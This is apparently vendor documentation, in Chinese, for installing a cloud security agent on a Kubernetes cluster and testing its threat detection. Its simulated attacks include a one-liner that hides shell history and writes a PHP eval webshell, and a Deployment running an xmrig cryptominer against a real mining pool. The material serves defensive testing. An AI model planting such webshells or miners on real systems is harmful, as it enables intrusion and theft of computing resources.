云安全中心是一个实时识别、分析、预警安全威胁的统一安全管理系统,通过防勒索、防病毒、防篡改、镜像安全扫描、合规检查等安全能力,帮助您实现威胁检测、响应、溯源的自动化安全运营闭环,保护云上资产和本地服务器,同时满足监管合规要求。本文介绍如何在注册集群上安装和使用云安全中心。

前提条件

背景信息

云安全中心通过安全告警,实时抵御恶意入侵、使用漏洞和基线配置检测、消除系统弱点、预防恶意攻击,提供安全态势分析和安全可视化界面,满足事后追溯和分析需求,帮助您建立完整的资产(包括公有云服务器、混合云服务器、容器、云产品等)安全防护体系。

步骤一:安装云安全中心

  1. 登录容器服务管理控制台,在左侧导航栏中选择市场 > 应用市场
  2. 应用市场页面,单击应用目录页签,搜索并选中ack-aegis-installer
  3. ack-aegis-installer页面,单击一键部署
  4. 基本信息配置向导中,选择集群和命名空间,然后单击下一步
  5. 配置ack-aegis-installer组件相关参数信息。
    1. 登录云安全中心控制台,在左侧导航栏选择系统设置 > 功能设置
    2. 功能设置页面,单击安装/卸载插件页签,然后单击客户端安装指南页签,获取如下intall_key信息。
      install-key
    3. 参数配置页面,设置相应参数,然后单击确定
      注意 若您的install_key信息未填写或填写错误,会导致云安全中心安装失败。
      参数 说明 默认值
      controller.cluster_id 集群ID 当前所选择的集群ID,自动注入。
      controller.cluster_name 集群名称 当前所选择的集群名称,自动注入。
      limit_cpu CPU占用限制 200m
      limit_memory 内存占用限制 128Mi
      imagePullPolicy 镜像拉取策略 Always
      install_key 客户端安装Key 默认为空,此处必须使用上一步获取的intall_key信息进行填充。

步骤二:使用云安全中心

通过两个攻防示例说明如何在注册集群中使用云安全中心。

示例一: 在Pod中执行可疑命令

  1. 使用以下内容,创建ubuntu.yaml文件。
    apiVersion: v1
kind: Pod
metadata:
  name: ubuntu
  labels:
    app: ubuntu
spec:
  containers:
  - name: ubuntu
    image: ubuntu:latest
    command: ["/bin/sleep", "3650d"]
    imagePullPolicy: IfNotPresent
  restartPolicy: Always
  2. 执行以下命令,部署Ubuntu测试Pod。
    kubectl apply -f ubuntu.yaml
  3. 执行以下命令,在已部署好的Pod中以匿名的方式执行一个可疑的WebShell写入行为。
    bash -c "unset HISTFILE && echo '<?php @eval(\$_POST['x']); ?>' >shell.php"
  4. 登录云安全中心控制台查看威胁检测结果。
    在安全告警列表中出现三条攻击相关的事件告警,具体查看操作,请参见查看和处理告警事件11

    查看告警详情如下。

    12

示例二:集群被植入挖矿容器

说明 以下示例中的测试镜像基于真实的恶意挖矿镜像xmrig制作,用于模拟挖矿攻击。
  1. 导入测试的恶意挖矿镜像miner_image_xmrig.tar到指定的测试节点上。
  2. 使用以下内容,创建miner-test.yaml文件。
    apiVersion: apps/v1 # for versions before 1.8.0 use apps/v1beta1
kind: Deployment
metadata:
  name: miner-test
  labels:
    app: miner-test
spec:
  replicas: 1
  selector:
    matchLabels:
      app: miner-test
  template:
    metadata:
      labels:
        app: miner-test
    spec:
      containers:
      - name: miner-test
        image: xxxxx        //  镜像地址。
        args: ["-o xmr-eu2.nanopool.org:14444 -u AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -p worker -a rx/0"]
  3. 执行以下命令,启动挖矿容器。
    kubectl apply -f miner-test.yaml
  4. 登录云安全中心控制台查看威胁检测结果。
    威胁检测结果如下所示,具体查看操作,请参见查看和处理告警事件dig
  5. 执行以下命令,停止并删除该Deployment。
    注意 测试完成后,必须删除对应的Deployment。 
    kubectl delete Deployment miner-test